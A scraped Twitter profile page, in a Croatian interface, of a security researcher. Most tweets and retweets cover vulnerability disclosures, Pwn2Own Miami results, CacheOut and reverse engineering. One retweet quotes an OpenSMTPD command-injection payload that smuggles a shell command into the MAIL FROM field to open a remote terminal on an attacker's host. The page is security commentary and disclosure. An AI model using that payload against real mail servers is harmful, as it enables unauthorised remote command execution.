Pedro Ribeiro

@pedrib1337

Reverse Engineer | Director of Research at Agile Information Security

Vrijeme pridruživanja: svibanj 2016.

Tweetovi

Blokirali ste korisnika/cu @pedrib1337

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @pedrib1337

  1. Prikvačeni tweet
    27. kol 2019.

    Here we go again: Cisco UCS Director auth bypass + command injection = unauth RCE as root: Metasploit modules have been published, and are in the queue for integration! Patch now or cry later Thanks to for helping me disclose these

    Poništi
  2. 30. sij

    Unpopular opinion: "Hackers" (1995) is a shit film, and the ultimate hacker film is "The Matrix" (1999)

    Poništi
  3. proslijedio/la je Tweet
    30. sij

    OpenBSD sEcUrE bY DeFaUlT exploit: MAIL FROM:<;xterm --display yourip:0;>

    Poništi
  4. proslijedio/la je Tweet
    29. sij

    If you are into C++ reverse engineering and never tried OOAnalyzer you are missing out big time!

    Poništi
  5. proslijedio/la je Tweet
    29. sij

    Old school, mail to shell script, code exec and privilege escalation in OpenSMTPD

    Poništi
  6. proslijedio/la je Tweet

    can confirm. enable defender, crank it all the way up. as a redteamer, i can say its a pain in the ass to get around, so defenders should take advantage of that.

    Poništi
  7. 27. sij

    “Moreover, CacheOut bypasses the hardware mitigations released by Intel in response to Meltdown, thereby necessitating additional software fixes."

    Prikaži ovu nit
    Poništi
  8. 27. sij

    Another nail in the coffin of Intel's supposed performance advantage: "AMD is not affected by CacheOut, as AMD does not offer any feature akin to Intel TSX on their current offering of CPUs.”

    Prikaži ovu nit
    Poništi
  9. 27. sij

    Reminder that if you're not paying, you're the product

    Poništi
  10. proslijedio/la je Tweet
    24. sij

    Nintendo apparently forgot to enable compiler optimizations in Super Mario 64. Also, people of course decompiled it...

    Poništi
  11. proslijedio/la je Tweet
    23. sij

    10 days left to get your code into the Arctic Code Vault! On 02/02/2020, we will make a copy of every active public repository on GitHub to preserve them in a decommissioned coal mine for over 1,000 years.

    Poništi
  12. 24. sij

    And of course congrats to the second half of Incite, , who demonstrated some cool dotnet exploits

    Prikaži ovu nit
    Poništi
  13. 24. sij

    Had an awesome time, and great results in Pwn2own Miami with . We were in the lead until the last day, but needed one more entry to get Master of Pwn. Next time maybe? Congrats to Incite team for winning () and to for the awesome experience.

    Prikaži ovu nit
    Poništi
  14. proslijedio/la je Tweet
    23. sij

    In the good old days, when you bought a game with money, you owned a copy of the game forever.

    Poništi
  15. proslijedio/la je Tweet
    23. sij

    Congrats to the Flashback team ( & ) and the Horst Goertz for IT-Security team () for winning big so far at 🎉 So far, $180,000 has been awarded for pwning ICS products at the hacking competition.

    Poništi
  16. proslijedio/la je Tweet

    With Day Two in the books, here's the standings for Master of Pwn. For all of the latest updates and results, be sure to refer to the blog at

    Poništi
  17. proslijedio/la je Tweet
    22. sij

    Congratulations, and , on your successful attempt and confirmation!

    Poništi
  18. proslijedio/la je Tweet

    Confirmed! and used a multi-bug chain to code execution with continuation on the Rockwell Automation Factory Talk View SE. They earn another $25,000 and 25 more Master of Pwn points. Their total is now 75 points.

    Poništi
  19. proslijedio/la je Tweet

    What a way to end Day 1. and used an info leak and an unsafe deserialization to get code execution on the Inductive Automation Ignition. Their final effort for the day earns them another $25K & 25 more Master of Pwn points.

    Poništi
  20. proslijedio/la je Tweet

    The last attempt of Day 1 ends with a success! and were able to get System-level code execution on the Inductive Automation Ignition in the Control Server category. Off to the disclosure room for all the details.

    Poništi
  21. proslijedio/la je Tweet

    Confirmed! and used 2 bugs to get a remote shell (at System!) on the web server. They earned $25K and 25 Master of Pwn points in the process. Great work.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·